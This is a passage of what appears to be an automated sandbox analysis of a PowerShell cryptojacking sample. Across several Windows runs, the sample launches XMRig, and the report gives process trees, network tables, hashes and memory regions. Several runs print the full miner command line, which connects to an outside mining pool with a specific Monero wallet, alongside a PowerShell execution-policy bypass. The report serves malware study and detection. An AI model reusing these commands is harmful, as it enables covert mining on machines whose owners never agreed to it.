| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3828 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3828 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/3828-0-0x00007FF9F4E93000-0x00007FF9F4E95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2ywkijb.gyy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3828-10-0x000001494E4B0000-0x000001494E4D2000-memory.dmp
memory/3828-11-0x00007FF9F4E90000-0x00007FF9F5951000-memory.dmp
memory/3828-12-0x00007FF9F4E90000-0x00007FF9F5951000-memory.dmp
memory/3828-14-0x00007FF9F4E90000-0x00007FF9F5951000-memory.dmp
memory/3828-15-0x000001494E890000-0x000001494E8A2000-memory.dmp
memory/3828-16-0x000001494E4A0000-0x000001494E4AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3744-47-0x000002209D940000-0x000002209D960000-memory.dmp
memory/3828-48-0x00007FF9F4E93000-0x00007FF9F4E95000-memory.dmp
memory/3828-49-0x00007FF9F4E90000-0x00007FF9F5951000-memory.dmp
memory/3828-50-0x00007FF9F4E90000-0x00007FF9F5951000-memory.dmp
memory/3744-51-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-52-0x000002209D990000-0x000002209D9B0000-memory.dmp
memory/3744-53-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3828-55-0x00007FF9F4E90000-0x00007FF9F5951000-memory.dmp
memory/3744-54-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-57-0x000002209F190000-0x000002209F1B0000-memory.dmp
memory/3744-56-0x000002209F170000-0x000002209F190000-memory.dmp
memory/3744-58-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-59-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-62-0x000002209F190000-0x000002209F1B0000-memory.dmp
memory/3744-61-0x000002209F170000-0x000002209F190000-memory.dmp
memory/3744-60-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-63-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-64-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-65-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-66-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-67-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-68-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-69-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-70-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-71-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-72-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-73-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-74-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-75-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-76-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-77-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-78-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-79-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-80-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-81-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-82-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
memory/3744-83-0x00007FF701C80000-0x00007FF7028B3000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
293s
Max time network
297s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3348 wrote to memory of 3488 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3348 wrote to memory of 3488 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/3348-3-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp
memory/3348-5-0x000002B3D0410000-0x000002B3D0432000-memory.dmp
memory/3348-8-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/3348-9-0x000002B3D06E0000-0x000002B3D0756000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lwtzqefa.ygd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3348-10-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/3348-26-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/3348-30-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/3348-31-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp
memory/3348-32-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/3348-33-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/3348-66-0x000002B3D0440000-0x000002B3D044A000-memory.dmp
memory/3348-53-0x000002B3D06C0000-0x000002B3D06D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3488-95-0x0000022DEB1A0000-0x0000022DEB1C0000-memory.dmp
memory/3488-96-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-97-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-98-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-99-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-100-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-101-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-102-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-103-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-104-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-105-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-106-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-107-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-108-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-109-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-110-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-111-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-112-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-113-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-114-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-115-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-116-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-117-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-118-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-119-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-120-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
memory/3488-121-0x00007FF653FC0000-0x00007FF654BF3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win7-20240220-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
Network
Files
memory/1248-4-0x000007FEF5EDE000-0x000007FEF5EDF000-memory.dmp
memory/1248-5-0x000000001B8B0000-0x000000001BB92000-memory.dmp
memory/1248-6-0x0000000001E50000-0x0000000001E58000-memory.dmp
memory/1248-7-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
memory/1248-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
memory/1248-9-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
memory/1248-10-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
memory/1248-11-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
memory/1248-12-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
295s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4400 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4400 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/4400-4-0x00007FFA0F650000-0x00007FFA0F82B000-memory.dmp
memory/4400-5-0x00007FFA0F650000-0x00007FFA0F82B000-memory.dmp
memory/4400-6-0x00007FFA0F650000-0x00007FFA0F82B000-memory.dmp
memory/4400-7-0x0000026ED2FD0000-0x0000026ED2FF2000-memory.dmp
memory/4400-10-0x0000026EEB6F0000-0x0000026EEB766000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4iavthr.bgm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4400-25-0x00007FFA0F650000-0x00007FFA0F82B000-memory.dmp
memory/4400-29-0x00007FFA0F650000-0x00007FFA0F82B000-memory.dmp
memory/4400-49-0x0000026EEBA70000-0x0000026EEBA82000-memory.dmp
memory/4400-62-0x0000026EEB6D0000-0x0000026EEB6DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1964-91-0x0000014DFD490000-0x0000014DFD4B0000-memory.dmp
memory/1964-92-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-93-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-94-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-95-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-96-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-97-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-98-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-99-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-100-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-101-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-102-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-103-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-104-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-105-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-106-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-107-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-108-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-109-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-110-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-111-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-112-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-113-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-114-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
memory/1964-115-0x00007FF6C8260000-0x00007FF6C8E93000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
296s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3456 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3456 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
